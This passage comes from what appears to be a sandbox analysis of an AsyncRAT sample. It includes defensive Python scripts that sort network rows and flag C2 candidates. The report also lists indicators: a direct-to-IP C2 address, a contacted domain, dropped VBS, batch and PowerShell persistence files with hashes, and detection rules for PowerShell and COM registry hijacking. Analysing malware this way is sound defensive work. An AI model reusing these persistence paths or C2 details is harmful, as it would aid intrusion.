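    return [f for cmd in cmdlines for rule in RULES if (f := rule(cmd))]


if __name__ == "__main__":
    for f in triage(CMDLINES):
        print(f"{f.rule:32} {f.detail}")
```

The cmd /c wrapper and the powershell.exe it launches both trip the PowerShell rule, which is the expected doubling when a sandbox lists both the spawner and the spawned process; de-duplicate on the child PID if the source provides one. The Modifies registry class signature above is the same InProcServer32 write seen from the registry side, so either source can drive the COM rule.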

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp
US | 8.8.8.8:53 | www1.coulmandental.com | udp
US | 34.192.83.212:443 | www1.coulmandental.com | tcp
US | 8.8.8.8:53 | 212.83.192.34.in-addr.arpa | udp
US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp
US | 88.119.175.153:8808 | - | tcp
US | 8.8.8.8:53 | 153.175.119.88.in-addr.arpa | udp
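Most rows in this table are PTR (in-addr.arpa) lookups, which the Windows guest issues for peers it talks to; they are noise unless they point at an address that also shows up as a connection. Two rows carry the signal: www1.coulmandental.com over 443, contacted in both runs (the report does not show what was fetched), and a direct-to-IP TCP connection to 88.119.175.153:8808 with no preceding DNS resolution, the pattern to pull first given the AsyncRAT detection. The script below is an added example, not from the report; it parses the rows as the sandbox prints them (three fields when there is no domain), separates PTR lookups that are explained by an observed destination from those that are not, and lists direct-to-IP connections on non-web ports as C2 candidates.

```python
"""Sort the behavioral2 network rows into signal and noise.

Added example, not part of the report. ROWS are copied from the Network
table above; the classification is my own.
"""
import re

ROWS = """
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 8.8.8.8:53 212.83.192.34.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp
US 88.119.175.153:8808 tcp
US 8.8.8.8:53 153.175.119.88.in-addr.arpa udp
"""


def ptr_to_ip(name):
    """'212.83.192.34.in-addr.arpa' -> '34.192.83.212'; PTR names store octets reversed."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)\.(\d+)\.in-addr\.arpa\.?", name, re.I)
    return ".".join(reversed(m.groups())) if m else None


def parse_rows(text):
    """One dict per row; a three-field row is a connection with no domain."""
    rows = []
    for line in text.strip().splitlines():
        fields = line.split()
        if len(fields) == 3:
            fields.insert(2, "")
        country, dest, domain, proto = fields
        ip, port = dest.rsplit(":", 1)
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto.lower()})
    return rows


def classify(rows):
    """Bucket rows: forward DNS, PTR lookups (explained by a seen destination
    or not), TCP to a resolved name, and TCP straight to an IP."""
    dest_ips = {r["ip"] for r in rows}
    out = {"dns_forward": [], "ptr_explained": [], "ptr_unexplained": [],
           "resolved_tcp": [], "direct_ip_tcp": []}
    for r in rows:
        target = f'{r["ip"]}:{r["port"]}'
        if r["proto"] == "udp" and r["port"] == 53:
            ip = ptr_to_ip(r["domain"])
            if ip is None:
                out["dns_forward"].append(r["domain"])
            elif ip in dest_ips:
                out["ptr_explained"].append(ip)
            else:
                out["ptr_unexplained"].append(ip)
        elif r["proto"] == "tcp" and not r["domain"]:
            out["direct_ip_tcp"].append(target)
        elif r["proto"] == "tcp":
            out["resolved_tcp"].append(f'{r["domain"]} -> {target}')
    return out


def c2_candidates(result, web_ports=(80, 443)):
    """Direct-to-IP TCP on a non-web port: no name to pivot on, nothing to blend with."""
    return [t for t in result["direct_ip_tcp"]
            if int(t.rsplit(":", 1)[1]) not in web_ports]


if __name__ == "__main__":
    result = classify(parse_rows(ROWS))
    for bucket, items in result.items():
        print(f"{bucket:16} {items}")
    print("C2 candidates:", c2_candidates(result))
```

The nine unexplained PTR targets never appear as a destination in the table, so they belong to guest background traffic the capture happened to include rather than to the sample; the three explained ones are the DNS resolver itself and the two hosts the chain actually connected to.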

Files

memory/2232-0-0x00007FFC74443000-0x00007FFC74445000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfm1myhk.e3j.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2232-6-0x00000234AC6D0000-0x00000234AC6F2000-memory.dmp

memory/2232-11-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

memory/2232-12-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

memory/2232-22-0x00007FFC74443000-0x00007FFC74445000-memory.dmp

memory/2232-23-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 235a8eb126d835efb2e253459ab8b089
SHA1 293fbf68e6726a5a230c3a42624c01899e35a89f
SHA256 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512 a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

memory/2232-32-0x00007FFC74440000-0x00007FFC74F01000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 81fe8fe5684ecf16d936250bb94c852a
SHA1 a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40
SHA256 ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584
SHA512 d0a35efecc947e2e5d99d3f58a494693d5ebd48635f749f87f341e0a1ce965b7a413754a0316c973eebac4c8e8a12315a916adbc4350a0819132debde1ea7013

memory/3196-46-0x00000200F2910000-0x00000200F291E000-memory.dmp

memory/3308-47-0x0000000000F00000-0x0000000000F18000-memory.dmp

memory/3308-49-0x0000000005640000-0x0000000005656000-memory.dmp

memory/3308-50-0x0000000005F50000-0x00000000064F4000-memory.dmp

memory/3308-51-0x0000000005B50000-0x0000000005BE2000-memory.dmp

memory/3308-52-0x0000000005B40000-0x0000000005B4A000-memory.dmp

memory/3308-53-0x0000000006740000-0x00000000067DC000-memory.dmp

memory/3308-54-0x00000000067E0000-0x0000000006846000-memory.dmp